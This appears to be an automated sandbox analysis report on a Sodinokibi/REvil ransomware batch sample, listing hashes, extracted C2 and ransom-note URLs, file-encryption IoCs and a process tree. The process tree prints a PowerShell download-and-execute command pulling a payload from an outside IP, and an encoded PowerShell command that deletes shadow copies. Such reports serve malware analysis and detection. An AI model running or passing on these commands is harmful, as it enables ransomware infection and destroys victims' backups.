Analysis
Max time kernel: 66s
Max time network: 116s
Platform: windows10_x64
Resource: win10
Submitted: 19-08-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: 058f5b8d291ac79c2bb7a3f231e3b5d8.bat
  Resource: win7
Behavioral task: behavioral2
  Sample: 058f5b8d291ac79c2bb7a3f231e3b5d8.bat
  Resource: win10
General
Target: 058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Size: 217B
MD5: ac5dca786af1760da0a1d3554009dc33
SHA1: 983a1634a67dbebf5f835d167ba968f2daf3efb9
SHA256: fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189
SHA512: 5eae6e71fa72edefd9a1373baa4add4e9dd9fc6ad2e7410f83fb56b1ec10633b5bf2d296016857c9667564ee1043a9207f7dc8ff0dab8b363598902eb1f8c611
Malware Config
Extracted: http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8
Extracted: C:\s9m06ipi-readme.txt
  Family: sodinokibi
  URLs in ransom note:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E699305EEEC93634
    http://decryptor.cc/E699305EEEC93634
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
flow | pid | process
3 | 3784 | powershell.exe
Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
description | ioc | process
File renamed | C:\Users\Admin\Pictures\SuspendUnprotect.png => \??\c:\users\admin\pictures\SuspendUnprotect.png.s9m06ipi | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\ClearSubmit.tiff | powershell.exe
File renamed | C:\Users\Admin\Pictures\ConvertFromAssert.tif => \??\c:\users\admin\pictures\ConvertFromAssert.tif.s9m06ipi | powershell.exe
File renamed | C:\Users\Admin\Pictures\ClearSubmit.tiff => \??\c:\users\admin\pictures\ClearSubmit.tiff.s9m06ipi | powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0451mc55dg19.bmp" | powershell.exe
Drops file in Program Files directory (31 IoCs)
Processes: powershell.exe
description | ioc | process
File opened for modification | \??\c:\program files\ExportReceive.eprtx | powershell.exe
File opened for modification | \??\c:\program files\SkipFormat.gif | powershell.exe
File opened for modification | \??\c:\program files\SplitTest.ini | powershell.exe
File opened for modification | \??\c:\program files\MoveRemove.jpeg | powershell.exe
File opened for modification | \??\c:\program files\UnlockFind.wpl | powershell.exe
File opened for modification | \??\c:\program files\UnblockProtect.mid | powershell.exe
File opened for modification | \??\c:\program files\SwitchSet.001 | powershell.exe
File opened for modification | \??\c:\program files\ApproveNew.html | powershell.exe
File opened for modification | \??\c:\program files\AssertUnlock.potx | powershell.exe
File opened for modification | \??\c:\program files\DenyImport.jpg | powershell.exe
File opened for modification | \??\c:\program files\OutSet.WTV | powershell.exe
File created | \??\c:\program files (x86)\s9m06ipi-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\CompareStop.rm | powershell.exe
File opened for modification | \??\c:\program files\ResolveSearch.xls | powershell.exe
File opened for modification | \??\c:\program files\ConvertToComplete.cr2 | powershell.exe
File opened for modification | \??\c:\program files\LockGroup.zip | powershell.exe
File opened for modification | \??\c:\program files\RepairGroup.png | powershell.exe
File opened for modification | \??\c:\program files\RequestDismount.wmv | powershell.exe
File opened for modification | \??\c:\program files\ShowSave.mp3 | powershell.exe
File opened for modification | \??\c:\program files\StepStart.bmp | powershell.exe
File opened for modification | \??\c:\program files\CompressEdit.rm | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromStart.ttf | powershell.exe
File opened for modification | \??\c:\program files\OpenTest.asx | powershell.exe
File opened for modification | \??\c:\program files\ReadRemove.7z | powershell.exe
File opened for modification | \??\c:\program files\SuspendRename.jfif | powershell.exe
File opened for modification | \??\c:\program files\SuspendUnpublish.zip | powershell.exe
File opened for modification | \??\c:\program files\UndoTest.docm | powershell.exe
File created | \??\c:\program files\s9m06ipi-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\BlockFormat.3gp | powershell.exe
File opened for modification | \??\c:\program files\DebugDismount.contact | powershell.exe
File opened for modification | \??\c:\program files\LimitCompress.nfo | powershell.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
3784 | powershell.exe
3784 | powershell.exe
3784 | powershell.exe
3784 | powershell.exe
3784 | powershell.exe
3324 | powershell.exe
3324 | powershell.exe
3324 | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 3784 | powershell.exe
Token: SeDebugPrivilege | 3784 | powershell.exe
Token: SeDebugPrivilege | 3324 | powershell.exe
Token: SeBackupPrivilege | 3908 | vssvc.exe
Token: SeRestorePrivilege | 3908 | vssvc.exe
Token: SeAuditPrivilege | 3908 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 3784 | powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 2728 wrote to memory of 3784 | 2728 | cmd.exe | powershell.exe
PID 2728 wrote to memory of 3784 | 2728 | cmd.exe | powershell.exe
PID 2728 wrote to memory of 3784 | 2728 | cmd.exe | powershell.exe
PID 3784 wrote to memory of 3324 | 3784 | powershell.exe | powershell.exe
PID 3784 wrote to memory of 3324 | 3784 | powershell.exe | powershell.exe
PID 3784 wrote to memory of 3324 | 3784 | powershell.exe | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\058f5b8d291ac79c2bb7a3f231e3b5d8.bat"
  PID: 2728
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8');Invoke-SFWJRWOSAI;Start-Sleep -s 10000"
    PID: 3784
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      PID: 3324
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  PID: 3908
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken